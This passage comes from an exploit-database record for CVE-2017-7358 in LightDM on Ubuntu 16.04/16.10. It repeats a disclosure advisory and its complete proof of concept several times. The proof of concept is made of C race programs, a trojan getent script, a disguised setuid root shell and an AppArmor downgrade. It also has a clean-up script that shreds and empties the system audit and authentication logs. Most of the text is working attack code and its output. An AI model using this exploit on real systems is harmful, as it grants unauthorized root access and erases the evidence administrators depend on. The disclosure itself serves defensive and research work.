i.e. root. Since we\r\nhave already taken over \u2018*/usr/local/sbin*\u2018 and have planted our own \u2018\r\n*getent*\u2018, we get to execute commands as root at this point.\r\n \r\nNote \u2013 We can trigger the guest session creation script by entering the\r\nfollowing two commands.\r\n \r\nXDG_SEAT_PATH=\"/org/freedesktop/DisplayManager/Seat0\" /usr/bin/dm-tool lock\r\nXDG_SEAT_PATH=\"/org/freedesktop/DisplayManager/Seat0\" /usr/bin/dm-tool\r\nswitch-to-guest\r\n \r\n \r\nProof of Concept\r\n \r\nThe Proof of Concept is contains 9 files and they will take advantage of\r\nthe race conditions mentioned above.\r\n \r\n 1. kodek/bin/cat\r\n 2. kodek/shell.c\r\n 3. kodek/clean.sh\r\n 4. kodek/run.sh\r\n 5. kodek/stage1.sh\r\n 6. kodek/stage1local.sh\r\n 7. kodek/stage2.sh\r\n 8. kodek/boclocal.c\r\n 9. kodek/boc.c\r\n \r\nBy running the following scripts an attacker can run root commands:\r\n \r\n@ubuntu:/var/tmp/kodek$ ./stage1local.sh\r\n \r\n@ubuntu:/var/tmp/kodek$\r\n[!] GAME OVER !!!\r\n[!] count1: 2337 count2: 7278\r\n[!] w8 1 minute and run /bin/subash\r\n \r\n@ubuntu:/var/tmp/kodek$ /bin/subash\r\n[email\u00a0protected]:~# id\r\nuid=0(root) gid=0(root) groups=0(root)\r\n[email\u00a0protected]:~#\r\n \r\nIf the exploit fails, you can simply run it again.\r\n \r\nOnce you get your root shell, you can optionally clean any exploit files\r\nand logs by executing the below.\r\n \r\n[email\u00a0protected]:/var/tmp/kodek# ./clean.sh\r\n/usr/bin/shred: /var/log/audit/audit.log: failed to open for writing: No such\r\nfile or directory\r\nDo you want to remove exploit (y/n)?\r\ny\r\n/usr/bin/shred: /var/tmp/kodek/bin: failed to open for writing: Is a\r\ndirectory\r\n \r\n[email\u00a0protected]:/var/tmp/kodek#\r\n \r\nboc.c\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <ctype.h>\r\n#include <sys/inotify.h>\r\n#include <sys/stat.h>\r\n#include <pwd.h>\r\n#define EVENT_SIZE(sizeof(struct inotify_event))\r\n#define EVENT_BUF_LEN(1024 * (EVENT_SIZE + 16))\r\nint main(void) {\r\n struct stat info;\r\n struct passwd * pw;\r\n struct inotify_event * event;\r\n pw = getpwnam(\"root\");\r\n if (pw == NULL) exit(0);\r\n char newpath[20] = \"old.\";\r\n int length = 0, i, fd, wd, count1 = 0, count2 = 0;\r\n int a, b;\r\n char buffer[EVENT_BUF_LEN];\r\n fd = inotify_init();\r\n if (fd < 0) exit(0);\r\n wd = inotify_add_watch(fd, \"/tmp/\", IN_CREATE | IN_MOVED_FROM);\r\n if (wd < 0) exit(0);\r\n chdir(\"/tmp/\");\r\n while (1) {\r\n length = read(fd, buffer, EVENT_BUF_LEN);\r\n if (length > 0) {\r\n event = (struct inotify_event * ) buffer;\r\n if (event - > len) {\r\n if (strstr(event - > name, \"guest-\") != NULL) {\r\n for (i = 0; event - > name[i] != '\\0'; i++) {\r\n event - > name[i] = tolower(event - > name[i]);\r\n }\r\n if (event - > mask & IN_CREATE) mkdir(event - > name, ACCESSPERMS)\r\n;\r\n if (event - > mask & IN_MOVED_FROM) {\r\n rename(event - > name, strncat(newpath, event - > name, 15));\r\n symlink(\"/usr/local/sbin/\", event - > name);\r\n while (1) {\r\n count1 = count1 + 1;\r\n pw = getpwnam(event - > name);\r\n if (pw != NULL) break;\r\n }\r\n while (1) {\r\n count2 = count2 + 1;\r\n stat(\"/usr/local/sbin/\", & info);\r\n if (info.st_uid == pw - > pw_uid) {\r\n a = unlink(event - > name);\r\n b = mkdir(event - > name, ACCESSPERMS);\r\n if (a == 0 && b == 0) {\r\n printf(\"\\n[!] GAME OVER !!!\\n[!] count1: %i count2: %i\\n\",\r\ncount1, count2);\r\n } else {\r\n printf(\"\\n[!] a: %i b: %i\\n[!] exploit failed !!!\\n\", a, b\r\n);\r\n }\r\n system(\"/bin/rm -rf /tmp/old.*\");\r\n inotify_rm_watch(fd, wd);\r\n close(fd);\r\n exit(0);\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n}\r\n \r\nboclocal.c\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <ctype.h>\r\n#include <sys/inotify.h>\r\n#include <sys/stat.h>\r\n#include <pwd.h>\r\n#define EVENT_SIZE(sizeof(struct inotify_event))\r\n#define EVENT_BUF_LEN(1024 * (EVENT_SIZE + 16))\r\nint main(void) {\r\n struct stat info;\r\n struct passwd * pw;\r\n struct inotify_event * event;\r\n pw = getpwnam(\"root\");\r\n if (pw == NULL) exit(0);\r\n char newpath[20] = \"old.\";\r\n int length = 0, i, fd, wd, count1 = 0, count2 = 0;\r\n int a, b, c;\r\n char buffer[EVENT_BUF_LEN];\r\n fd = inotify_init();\r\n if (fd < 0) exit(0);\r\n wd = inotify_add_watch(fd, \"/tmp/\", IN_CREATE | IN_MOVED_FROM);\r\n if (wd < 0) exit(0);\r\n chdir(\"/tmp/\");\r\n while (1) {\r\n length = read(fd, buffer, EVENT_BUF_LEN);\r\n if (length > 0) {\r\n event = (struct inotify_event * ) buffer;\r\n if (event - > len) {\r\n if (strstr(event - > name, \"guest-\") != NULL) {\r\n for (i = 0; event - > name[i] != '\\0'; i++) {\r\n event - > name[i] = tolower(event - > name[i]);\r\n }\r\n if (event - > mask & IN_CREATE) mkdir(event - > name, ACCESSPERMS)\r\n;\r\n if (event - > mask & IN_MOVED_FROM) {\r\n rename(event - > name, strncat(newpath, event - > name, 15));\r\n symlink(\"/usr/local/sbin/\", event - > name);\r\n while (1) {\r\n count1 = count1 + 1;\r\n pw = getpwnam(event - > name);\r\n if (pw != NULL) break;\r\n }\r\n while (1) {\r\n count2 = count2 + 1;\r\n stat(\"/usr/local/sbin/\", & info);\r\n if (info.st_uid == pw - > pw_uid) {\r\n a = unlink(event - > name);\r\n b = mkdir(event - > name, ACCESSPERMS);\r\n c = symlink(\"/var/tmp/kodek/bin/\", strncat(event - > name,\r\n\"/bin\", 5));\r\n if (a == 0 && b == 0 && c == 0) {\r\n printf(\"\\n[!] GAME OVER !!!\\n[!] count1: %i count2:\r\n%i\\n[!] w8 1 minute and run /bin/subash\\n\", count1, count2);\r\n } else {\r\n printf(\"\\n[!] a: %i b: %i c: %i\\n[!] exploit failed\r\n!!!\\n[!] w8 1 minute and run it again\\n\", a, b, c);\r\n }\r\n system(\"/bin/rm -rf /tmp/old.*\");\r\n inotify_rm_watch(fd, wd);\r\n close(fd);\r\n exit(0);\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n}\r\n \r\nclean.sh\r\n \r\n#!/bin/bash\r\nif [ \"$(/usr/bin/id -u)\" != \"0\" ]; then\r\n echo \"This script must be run as root\" 1>&2\r\n exit 1\r\nfi\r\n/bin/rm -rf /tmp/guest-* /tmp/old.guest-*\r\n/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc /var/log/kern\r\n.log /var/log/audit/audit.log /var/log/lightdm/*\r\n/bin/echo > /var/log/auth.log\r\n/bin/echo > /var/log/syslog\r\n/bin/dmesg -c >/dev/null 2>&1\r\n/bin/echo \"Do you want to remove exploit (y/n)?\"\r\nread answer\r\nif [ \"$answer\" == \"y\" ]; then\r\n/usr/bin/shred -fu /var/tmp/kodek/* /var/tmp/kodek/bin/*\r\n/bin/rm -rf /var/tmp/kodek\r\nelse\r\nexit\r\nfi\r\n \r\nrun.sh\r\n \r\n#!/bin/sh\r\n/bin/cat << EOF > /usr/local/sbin/getent\r\n#!/bin/bash\r\n/bin/cp /var/tmp/shell /bin/subash >/dev/null 2>&1\r\n/bin/chmod 4111 /bin/subash >/dev/null 2>&1\r\nCOUNTER=0\r\nwhile [ \\$COUNTER -lt 10 ]; do\r\n/bin/umount -lf /usr/local/sbin/ >/dev/null 2>&1\r\nlet COUNTER=COUNTER+1\r\ndone\r\n/bin/sed -i 's/\\/usr\\/lib\\/lightdm\\/lightdm-guest-session\r\n{/\\/usr\\/lib\\/lightdm\\/lightdm-guest-session flags=(complain) {/g' /etc/\r\napparmor.d/lightdm-guest-session >/dev/null 2>&1\r\n/sbin/apparmor_parser -r /etc/apparmor.d/lightdm-guest-session >/dev/null 2>\r\n&1\r\n/usr/bin/getent passwd \"\\$2\"\r\nEOF\r\n/bin/chmod 755 /usr/local/sbin/getent >/dev/null 2>&1\r\n \r\nshell.c\r\n \r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <grp.h>\r\n \r\nint main(void)\r\n{\r\n setresuid(0, 0, 0);\r\n setresgid(0, 0, 0);\r\n setgroups(0, NULL);\r\n putenv(\"HISTFILE=/dev/null\");\r\n execl(\"/bin/bash\", \"[bioset]\", \"-pi\", NULL);\r\n return 0;\r\n}\r\n \r\nstage1.sh\r\n \r\n#!/bin/bash\r\nif [ \"${PWD}\" == \"/var/tmp/kodek\" ]; then\r\n/usr/bin/killall -9 /var/tmp/boc >/dev/null 2>&1\r\n/usr/bin/killall -9 boc >/dev/null 2>&1\r\n/bin/sleep 3s\r\n/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc >/dev/null 2>\r\n&1\r\n/usr/bin/gcc boc.c -Wall -s -o /var/tmp/boc\r\n/usr/bin/gcc shell.c -Wall -s -o /var/tmp/shell\r\n/bin/cp /var/tmp/kodek/run.sh /var/tmp/run.sh\r\n/var/tmp/boc\r\nelse\r\necho \"[!] run me from /var/tmp/kodek\"\r\nexit\r\nfi\r\n \r\nstage1local.sh\r\n \r\n#!/bin/bash\r\nif [ \"${PWD}\" == \"/var/tmp/kodek\" ]; then\r\n/usr/bin/killall -9 /var/tmp/boc >/dev/null 2>&1\r\n/usr/bin/killall -9 boc >/dev/null 2>&1\r\n/bin/sleep 3s\r\n/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc >/dev/null 2>\r\n&1\r\n/usr/bin/gcc boclocal.c -Wall -s -o /var/tmp/boc\r\n/usr/bin/gcc shell.c -Wall -s -o /var/tmp/shell\r\n/bin/cp /var/tmp/kodek/run.sh /var/tmp/run.sh\r\n/var/tmp/boc &\r\n/bin/sleep 5s\r\nXDG_SEAT_PATH=\"/org/freedesktop/DisplayManager/Seat0\" /usr/bin/dm-tool lock\r\nXDG_SEAT_PATH=\"/org/freedesktop/DisplayManager/Seat0\" /usr/bin/dm-tool\r\nswitch-to-guest\r\nelse\r\necho \"[!] run me from /var/tmp/kodek\"\r\nexit\r\nfi\r\n \r\nstage2.sh\r\n \r\n#!/bin/sh\r\n/usr/bin/systemd-run --user /var/tmp/run.sh\r\n \r\n/bin/cat\r\n \r\n#!/bin/sh\r\n/usr/bin/systemd-run --user /var/tmp/run.sh\r\n/bin/sleep 15s\r\n/bin/loginctl terminate-session `/bin/loginctl session-status | /usr/bin/\r\nhead -1 | /usr/bin/awk '{ print $1 }'`\n\n# 0day.today [2018-02-09] #", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/27673"}], "packetstorm": [{"lastseen": "2017-04-26T17:25:36", "bulletinFamily": "exploit", "description": "", "modified": "2017-04-26T00:00:00", "published": "2017-04-26T00:00:00", "href": "https://packetstormsecurity.com/files/142320/LightDM-Ubuntu-16.04-16.10-Privilege-Escalation.html", "id": "PACKETSTORM:142320", "type": "packetstorm", "title": "LightDM (Ubuntu 16.04/16.10) Privilege Escalation", "sourceData": "`Source: https://blogs.securiteam.com/index.php/archives/3134 \n \nVulnerability Summary \nThe following advisory describes a local privilege escalation via LightDM \nfound in Ubuntu versions 16.10 / 16.04 LTS. \n \nUbuntu is an open source software platform that runs everywhere from IoT \ndevices, the smartphone, the tablet and the PC to the server and the \ncloud. LightDM is an X display manager that aims to be lightweight, fast, \nextensible and multi-desktop. It uses various front-ends to draw login \ninterfaces, also called Greeters. \n \n \nCredit \nAn independent security researcher, G. Geshev (@munmap), has reported this \nvulnerability to Beyond Securityas SecuriTeam Secure Disclosure program \n \n \nVendor Responses \nThe vendor has released a patch to address this issue. \nFor more information: https://www.ubuntu.com/usn/usn-3255-1/ \n \n \nCVE Details \nCVE-2017-7358 <https://nvd.nist.gov/vuln/detail/CVE-2017-7358> \n \n \nVulnerability Details \nThe vulnerability is found in *LightDM*, which is the Ubuntuas default \ndesktop manager, more specifically in the guest login feature. By default \n*LightDM* allows you to log into a session as a temporary user. This is \nimplemented in a script called a*guest-account*a. \n \n@ubuntu:~$ ls -l /usr/sbin/guest-account \n-rwxr-xr-x 1 root root 6516 Sep 29 18:56 /usr/sbin/guest-account \n \n@ubuntu:~$ dpkg -S /usr/sbin/guest-account \nlightdm: /usr/sbin/guest-account \n \n@ubuntu:~$ dpkg -s lightdm \nPackage: lightdm \nStatus: install ok installed \nPriority: optional \nSection: x11 \nInstalled-Size: 672 \nMaintainer: Robert Ancell <robert.ancell@ubuntu.com> \nArchitecture: amd64 \nVersion: 1.19.5-0ubuntu1 \nProvides: x-display-manager \nDepends: debconf (>= 0.5) | debconf-2.0, libc6 (>= 2.14), libgcrypt20 (>= \n1.7.0), libglib2.0-0 (>= 2.39.4), libpam0g (>= 0.99.7.1), libxcb1, libxdmcp6 \n, adduser, bash (>= 4.3), dbus, libglib2.0-bin, libpam-runtime (>= 0.76-14), \nlibpam-modules, plymouth (>= 0.8.8-0ubuntu18) \nPre-Depends: dpkg (>= 1.15.7.2) \nRecommends: xserver-xorg, unity-greeter | lightdm-greeter | lightdm-kde- \ngreeter \nSuggests: bindfs \nConflicts: liblightdm-gobject-0-0, liblightdm-qt-0-0 \nConffiles: \n/etc/apparmor.d/abstractions/lightdm a715707411c3cb670a68a4ad738077bf \n/etc/apparmor.d/abstractions/lightdm_chromium-browser \ne1195e34922a67fa219b8b95eaf9c305 \n/etc/apparmor.d/lightdm-guest-session 3c7812f49f27e733ad9b5d413c4d14cb \n/etc/dbus-1/system.d/org.freedesktop.DisplayManager.conf \nb76b6b45d7f7ff533c51d7fc02be32f4 \n/etc/init.d/lightdm be2b1b20bec52a04c1a877477864e188 \n/etc/init/lightdm.conf 07304e5b3265b4fb82a2c94beb9b577e \n/etc/lightdm/users.conf 1de1a7e321b98e5d472aa818893a2a3e \n/etc/logrotate.d/lightdm b6068c54606c0499db9a39a05df76ce9 \n/etc/pam.d/lightdm 1abe2be7a999b42517c82511d9e9ba22 \n/etc/pam.d/lightdm-autologin 28dd060554d1103ff847866658431ecf \n/etc/pam.d/lightdm-greeter 65ed119ce8f4079f6388b09ad9d8b2f9 \nDescription: Display Manager \nLightDM is a X display manager that: \n* Has a lightweight codebase \n* Is standards compliant (PAM, ConsoleKit, etc) \n* Has a well defined interface between the server and user interface \n* Cross-desktop (greeters can be written in any toolkit) \nHomepage: https://launchpad.net/lightdm \n \n@ubuntu:~$ \n \nThe script runs as root when you view the login screen, also known as a \ngreeter, to log in as a guest. Ubuntuas default greeter is Unity Greeter. \n \n \n*Vulnerable code* \n \nThe vulnerable function is a*add_account*a. \n \n35 temp_home=$(mktemp -td guest-XXXXXX) \n36 GUEST_HOME=$(echo ${temp_home} | tr '[:upper:]' '[:lower:]') \n37 GUEST_USER=${GUEST_HOME#/tmp/} \n38 [ ${GUEST_HOME} != ${temp_home} ] && mv ${temp_home} ${GUEST_HOME} \n \nThe guest folder gets created using amktempa on line 35. The attacker can \nuse a*inotify*a to monitor a*/tmp*a for the creation of this folder. \n \nThe folder name will likely contain both upper and lower case letters. Once \nthis folder is created, we grab the folder name and quickly and create the \nequivalent folder with all letters lower case. \n \nIf we manage to race the a*mv*a command on line 38, we end up with the \nnewly created home for the guest user inside the folder we own. \n \nOnce we have the guest home under our control, we rename it and replace it \nwith a *symbolic link* to a folder we want to take over. The code below \nwill then add the new user to the OS. The useras home folder will already \npoint to the folder we want to take over, for example a*/usr/local/sbin*a. \n \n68 useradd --system --home-dir ${GUEST_HOME} --comment $(gettext \"Guest\") \n--user-group --shell /bin/bash ${GUEST_USER} || { \n69 rm -rf ${GUEST_HOME} \n70 exit 1 \n71 } \n \nThe attacker can grab the newly created useras ID and monitor a \n*/usr/local/sbin*a for ownership changes. The ownership will be changed by \nthe following a*mount*a. \n \n78 mount -t tmpfs -o mode=700,uid=${GUEST_USER} none ${GUEST_HOME} || { \n79 rm -rf ${GUEST_HOME} \n80 exit 1 \n81 } \n \nWe will remove the symbolic link and create a folder with the same name a \nto let the guest user to log in. While the guest is logging in, his path \nfor finding executable files will include a*bin*a under his home folder. \n \nThatas why we create a new symbolic link to point his a*bin*a into a folder \nwe control. This way we can force the user to execute our own code under \nhis user ID. We use this to log out the guest user from his session which \nis where we can gain root access. \n \nThe logout code will first execute the following code: \n \n156 PWENT=$(getent passwd ${GUEST_USER}) || { \n157 echo \"Error: invalid user ${GUEST_USER}\" \n158 exit 1 \n159 } \n \nThis code will be executed as the owner of the script, i.e. root. Since we \nhave already taken over a*/usr/local/sbin*a and have planted our own a \n*getent*a, we get to execute commands as root at this point. \n \nNote a We can trigger the guest session creation script by entering the \nfollowing two commands. \n \nXDG_SEAT_PATH=\"/org/freedesktop/DisplayManager/Seat0\" /usr/bin/dm-tool lock \nXDG_SEAT_PATH=\"/org/freedesktop/DisplayManager/Seat0\" /usr/bin/dm-tool \nswitch-to-guest \n \n \nProof of Concept \n \nThe Proof of Concept is contains 9 files and they will take advantage of \nthe race conditions mentioned above. \n \n1. kodek/bin/cat \n2. kodek/shell.c \n3. kodek/clean.sh \n4. kodek/run.sh \n5. kodek/stage1.sh \n6. kodek/stage1local.sh \n7. kodek/stage2.sh \n8. kodek/boclocal.c \n9. kodek/boc.c \n \nBy running the following scripts an attacker can run root commands: \n \n@ubuntu:/var/tmp/kodek$ ./stage1local.sh \n \n@ubuntu:/var/tmp/kodek$ \n[!] GAME OVER !!! \n[!] count1: 2337 count2: 7278 \n[!] w8 1 minute and run /bin/subash \n \n@ubuntu:/var/tmp/kodek$ /bin/subash \nroot@ubuntu:~# id \nuid=0(root) gid=0(root) groups=0(root) \nroot@ubuntu:~# \n \nIf the exploit fails, you can simply run it again. \n \nOnce you get your root shell, you can optionally clean any exploit files \nand logs by executing the below. \n \nroot@ubuntu:/var/tmp/kodek# ./clean.sh \n/usr/bin/shred: /var/log/audit/audit.log: failed to open for writing: No such \nfile or directory \nDo you want to remove exploit (y/n)? \ny \n/usr/bin/shred: /var/tmp/kodek/bin: failed to open for writing: Is a \ndirectory \n \nroot@ubuntu:/var/tmp/kodek# \n \nboc.c \n \n#include <stdio.h> \n#include <stdlib.h> \n#include <unistd.h> \n#include <string.h> \n#include <ctype.h> \n#include <sys/inotify.h> \n#include <sys/stat.h> \n#include <pwd.h> \n#define EVENT_SIZE(sizeof(struct inotify_event)) \n#define EVENT_BUF_LEN(1024 * (EVENT_SIZE + 16)) \nint main(void) { \nstruct stat info; \nstruct passwd * pw; \nstruct inotify_event * event; \npw = getpwnam(\"root\"); \nif (pw == NULL) exit(0); \nchar newpath[20] = \"old.\"; \nint length = 0, i, fd, wd, count1 = 0, count2 = 0; \nint a, b; \nchar buffer[EVENT_BUF_LEN]; \nfd = inotify_init(); \nif (fd < 0) exit(0); \nwd = inotify_add_watch(fd, \"/tmp/\", IN_CREATE | IN_MOVED_FROM); \nif (wd < 0) exit(0); \nchdir(\"/tmp/\"); \nwhile (1) { \nlength = read(fd, buffer, EVENT_BUF_LEN); \nif (length > 0) { \nevent = (struct inotify_event * ) buffer; \nif (event - > len) { \nif (strstr(event - > name, \"guest-\") != NULL) { \nfor (i = 0; event - > name[i] != '\\0'; i++) { \nevent - > name[i] = tolower(event - > name[i]); \n} \nif (event - > mask & IN_CREATE) mkdir(event - > name, ACCESSPERMS) \n; \nif (event - > mask & IN_MOVED_FROM) { \nrename(event - > name, strncat(newpath, event - > name, 15)); \nsymlink(\"/usr/local/sbin/\", event - > name); \nwhile (1) { \ncount1 = count1 + 1; \npw = getpwnam(event - > name); \nif (pw != NULL) break; \n} \nwhile (1) { \ncount2 = count2 + 1; \nstat(\"/usr/local/sbin/\", & info); \nif (info.st_uid == pw - > pw_uid) { \na = unlink(event - > name); \nb = mkdir(event - > name, ACCESSPERMS); \nif (a == 0 && b == 0) { \nprintf(\"\\n[!] GAME OVER !!!\\n[!] count1: %i count2: %i\\n\", \ncount1, count2); \n} else { \nprintf(\"\\n[!] a: %i b: %i\\n[!] exploit failed !!!\\n\", a, b \n); \n} \nsystem(\"/bin/rm -rf /tmp/old.*\"); \ninotify_rm_watch(fd, wd); \nclose(fd); \nexit(0); \n} \n} \n} \n} \n} \n} \n} \n} \n \nboclocal.c \n \n#include <stdio.h> \n#include <stdlib.h> \n#include <unistd.h> \n#include <string.h> \n#include <ctype.h> \n#include <sys/inotify.h> \n#include <sys/stat.h> \n#include <pwd.h> \n#define EVENT_SIZE(sizeof(struct inotify_event)) \n#define EVENT_BUF_LEN(1024 * (EVENT_SIZE + 16)) \nint main(void) { \nstruct stat info; \nstruct passwd * pw; \nstruct inotify_event * event; \npw = getpwnam(\"root\"); \nif (pw == NULL) exit(0); \nchar newpath[20] = \"old.\"; \nint length = 0, i, fd, wd, count1 = 0, count2 = 0; \nint a, b, c; \nchar buffer[EVENT_BUF_LEN]; \nfd = inotify_init(); \nif (fd < 0) exit(0); \nwd = inotify_add_watch(fd, \"/tmp/\", IN_CREATE | IN_MOVED_FROM); \nif (wd < 0) exit(0); \nchdir(\"/tmp/\"); \nwhile (1) { \nlength = read(fd, buffer, EVENT_BUF_LEN); \nif (length > 0) { \nevent = (struct inotify_event * ) buffer; \nif (event - > len) { \nif (strstr(event - > name, \"guest-\") != NULL) { \nfor (i = 0; event - > name[i] != '\\0'; i++) { \nevent - > name[i] = tolower(event - > name[i]); \n} \nif (event - > mask & IN_CREATE) mkdir(event - > name, ACCESSPERMS) \n; \nif (event - > mask & IN_MOVED_FROM) { \nrename(event - > name, strncat(newpath, event - > name, 15)); \nsymlink(\"/usr/local/sbin/\", event - > name); \nwhile (1) { \ncount1 = count1 + 1; \npw = getpwnam(event - > name); \nif (pw != NULL) break; \n} \nwhile (1) { \ncount2 = count2 + 1; \nstat(\"/usr/local/sbin/\", & info); \nif (info.st_uid == pw - > pw_uid) { \na = unlink(event - > name); \nb = mkdir(event - > name, ACCESSPERMS); \nc = symlink(\"/var/tmp/kodek/bin/\", strncat(event - > name, \n\"/bin\", 5)); \nif (a == 0 && b == 0 && c == 0) { \nprintf(\"\\n[!] GAME OVER !!!\\n[!] count1: %i count2: \n%i\\n[!] w8 1 minute and run /bin/subash\\n\", count1, count2); \n} else { \nprintf(\"\\n[!] a: %i b: %i c: %i\\n[!] exploit failed \n!!!\\n[!] w8 1 minute and run it again\\n\", a, b, c); \n} \nsystem(\"/bin/rm -rf /tmp/old.*\"); \ninotify_rm_watch(fd, wd); \nclose(fd); \nexit(0); \n} \n} \n} \n} \n} \n} \n} \n} \n \nclean.sh \n \n#!/bin/bash \nif [ \"$(/usr/bin/id -u)\" != \"0\" ]; then \necho \"This script must be run as root\" 1>&2 \nexit 1 \nfi \n/bin/rm -rf /tmp/guest-* /tmp/old.guest-* \n/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc /var/log/kern \n.log /var/log/audit/audit.log /var/log/lightdm/* \n/bin/echo > /var/log/auth.log \n/bin/echo > /var/log/syslog \n/bin/dmesg -c >/dev/null 2>&1 \n/bin/echo \"Do you want to remove exploit (y/n)?\" \nread answer \nif [ \"$answer\" == \"y\" ]; then \n/usr/bin/shred -fu /var/tmp/kodek/* /var/tmp/kodek/bin/* \n/bin/rm -rf /var/tmp/kodek \nelse \nexit \nfi \n \nrun.sh \n \n#!/bin/sh \n/bin/cat << EOF > /usr/local/sbin/getent \n#!/bin/bash \n/bin/cp /var/tmp/shell /bin/subash >/dev/null 2>&1 \n/bin/chmod 4111 /bin/subash >/dev/null 2>&1 \nCOUNTER=0 \nwhile [ \\$COUNTER -lt 10 ]; do \n/bin/umount -lf /usr/local/sbin/ >/dev/null 2>&1 \nlet COUNTER=COUNTER+1 \ndone \n/bin/sed -i 's/\\/usr\\/lib\\/lightdm\\/lightdm-guest-session \n{/\\/usr\\/lib\\/lightdm\\/lightdm-guest-session flags=(complain) {/g' /etc/ \napparmor.d/lightdm-guest-session >/dev/null 2>&1 \n/sbin/apparmor_parser -r /etc/apparmor.d/lightdm-guest-session >/dev/null 2> \n&1 \n/usr/bin/getent passwd \"\\$2\" \nEOF \n/bin/chmod 755 /usr/local/sbin/getent >/dev/null 2>&1 \n \nshell.c \n \n#define _GNU_SOURCE \n#include <stdio.h> \n#include <stdlib.h> \n#include <unistd.h> \n#include <grp.h> \n \nint main(void) \n{ \nsetresuid(0, 0, 0); \nsetresgid(0, 0, 0); \nsetgroups(0, NULL); \nputenv(\"HISTFILE=/dev/null\"); \nexecl(\"/bin/bash\", \"[bioset]\", \"-pi\", NULL); \nreturn 0; \n} \n \nstage1.sh \n \n#!/bin/bash \nif [ \"${PWD}\" == \"/var/tmp/kodek\" ]; then \n/usr/bin/killall -9 /var/tmp/boc >/dev/null 2>&1 \n/usr/bin/killall -9 boc >/dev/null 2>&1 \n/bin/sleep 3s \n/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc >/dev/null 2> \n&1 \n/usr/bin/gcc boc.c -Wall -s -o /var/tmp/boc \n/usr/bin/gcc shell.c -Wall -s -o /var/tmp/shell \n/bin/cp /var/tmp/kodek/run.sh /var/tmp/run.sh \n/var/tmp/boc \nelse \necho \"[!] run me from /var/tmp/kodek\" \nexit \nfi \n \nstage1local.sh \n \n#!/bin/bash \nif [ \"${PWD}\" == \"/var/tmp/kodek\" ]; then \n/usr/bin/killall -9 /var/tmp/boc >/dev/null 2>&1 \n/usr/bin/killall -9 boc >/dev/null 2>&1 \n/bin/sleep 3s \n/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc >/dev/null 2> \n&1 \n/usr/bin/gcc boclocal.c -Wall -s -o /var/tmp/boc \n/usr/bin/gcc shell.c -Wall -s -o /var/tmp/shell \n/bin/cp /var/tmp/kodek/run.sh /var/tmp/run.sh \n/var/tmp/boc & \n/bin/sleep 5s \nXDG_SEAT_PATH=\"/org/freedesktop/DisplayManager/Seat0\" /usr/bin/dm-tool lock \nXDG_SEAT_PATH=\"/org/freedesktop/DisplayManager/Seat0\" /usr/bin/dm-tool \nswitch-to-guest \nelse \necho \"[!] run me from /var/tmp/kodek\" \nexit \nfi \n \nstage2.sh \n \n#!/bin/sh \n/usr/bin/systemd-run --user /var/tmp/run.sh \n \n/bin/cat \n \n#!/bin/sh \n/usr/bin/systemd-run --user /var/tmp/run.sh \n/bin/sleep 15s \n/bin/loginctl terminate-session `/bin/loginctl session-status | /usr/bin/ \nhead -1 | /usr/bin/awk '{ print $1 }'` \n \n \n`\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142320/lightdm-escalate.txt"}], "exploitdb": [{"lastseen": "2017-04-25T18:47:21", "bulletinFamily": "exploit", "description": "Ubuntu 16.10 / 16.04 LTS - LightDM Guest Account Local Privilege Escalation. CVE-2017-7358. Local exploit for Linux platform. Tags: Local", "modified": "2017-04-25T00:00:00", "published": "2017-04-25T00:00:00", "id": "EDB-ID:41923", "href": "https://www.exploit-db.com/exploits/41923/", "type": "exploitdb", "title": "Ubuntu 16.10 / 16.04 LTS - LightDM Guest Account Local Privilege Escalation", "sourceData": "Source: https://blogs.securiteam.com/index.php/archives/3134\r\n\r\nVulnerability Summary\r\nThe following advisory describes a local privilege escalation via LightDM\r\nfound in Ubuntu versions 16.10 / 16.04 LTS.\r\n\r\nUbuntu is an open source software platform that runs everywhere from IoT\r\ndevices, the smartphone, the tablet and the PC to the server and the\r\ncloud. LightDM is an X display manager that aims to be lightweight, fast,\r\nextensible and multi-desktop. It uses various front-ends to draw login\r\ninterfaces, also called Greeters.\r\n\r\n\r\nCredit\r\nAn independent security researcher, G. Geshev (@munmap), has reported this\r\nvulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n\r\n\r\nVendor Responses\r\nThe vendor has released a patch to address this issue.\r\nFor more information: https://www.ubuntu.com/usn/usn-3255-1/\r\n\r\n\r\nCVE Details\r\nCVE-2017-7358 <https://nvd.nist.gov/vuln/detail/CVE-2017-7358>\r\n\r\n\r\nVulnerability Details\r\nThe vulnerability is found in *LightDM*, which is the Ubuntu\u2019s default\r\ndesktop manager, more specifically in the guest login feature. By default\r\n*LightDM* allows you to log into a session as a temporary user. This is\r\nimplemented in a script called \u2018*guest-account*\u2018.\r\n\r\n@ubuntu:~$ ls -l /usr/sbin/guest-account\r\n-rwxr-xr-x 1 root root 6516 Sep 29 18:56 /usr/sbin/guest-account\r\n\r\n@ubuntu:~$ dpkg -S /usr/sbin/guest-account\r\nlightdm: /usr/sbin/guest-account\r\n\r\n@ubuntu:~$ dpkg -s lightdm\r\nPackage: lightdm\r\nStatus: install ok installed\r\nPriority: optional\r\nSection: x11\r\nInstalled-Size: 672\r\nMaintainer: Robert Ancell <robert.ancell@ubuntu.com>\r\nArchitecture: amd64\r\nVersion: 1.19.5-0ubuntu1\r\nProvides: x-display-manager\r\nDepends: debconf (>= 0.5) | debconf-2.0, libc6 (>= 2.14), libgcrypt20 (>=\r\n1.7.0), libglib2.0-0 